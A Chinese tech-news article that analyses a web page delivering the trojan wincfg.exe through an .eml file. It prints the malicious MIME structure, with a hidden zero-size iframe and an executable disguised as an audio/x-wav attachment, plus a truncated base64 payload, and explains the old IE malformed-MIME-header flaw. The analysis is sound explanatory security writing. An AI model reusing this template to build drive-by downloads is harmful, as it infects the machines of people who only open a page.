扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
注意到其中的“wincfg.eml”了吗?大家都知道eml为邮件格式,网页中要eml文件干什么呢?非常可疑!再次浏览该网页,再看看任务管理器,wincfg.exe进程又回来了,原来问题就在这个文件上!既然问题在这文件上,当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来,鼠标刚点上去,wincfg.exe又被执行了,真是阴魂不散啊!
打开a.eml,发现其内容如下:
From: "xxx" To: "xxx" Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable
HTML>
HEAD>
/HEAD>
BODY bgColor=3D#ffffff>
iframe src=3Dcid:THE-CID height=3D0 width=3D0>
/BODY>
--2--
--1
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA……(以下删掉一大节)
--1
你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符,就是wincfg.exe经过base64编码的内容。上面这些代码中,关键的是下面这一段:
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID:
其中,name="wincfg.exe"这一句定义了文件名称,在此为wincfg.exe。 而这一句:Content-Transfer-Encoding: base64则定义了代码格式为base64。
从这句Content-ID: 开始才是代码的起步,
“TVqQAAMAAAAEAAAA//8AAL”等为wincfg.exe文件的BASE64方式编码,这个以BASE64方式编码的文件会反编译成wincfg.exe文件并运行。这就是浏览该网页会中木马的原因!到此我就明白了,其实,所谓的浏览网页会中木马,只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已,说白了就是利用了错误的MIME头进行攻击。
1.MIME简介
MIME(Multipurpose Internet Mail Extentions),一般译作“多用途的网际邮件扩充协议”。顾名思义,它可以传送多媒体文件,在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息:e-mail,usenet新闻和Web)的通用方法。在使用CGI程序时你可能接触过MIME类型,其中有一行叫作Content-type的语句,它用来指明传递的就是MIME类型的文件(如text/html或text/plain)。
2.错误的MIME头漏洞的发现
该漏洞是由一个国外安全小组发现的,该小组发现在MIME在处理不正常的MIME类型时存在个问题,攻击者可以创建一个Html格式的E-mail,该E-mail的附件为可执行文件,通过修改MIME头,使IE不正确处理这个MIME所指定的可执行文件附件。
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。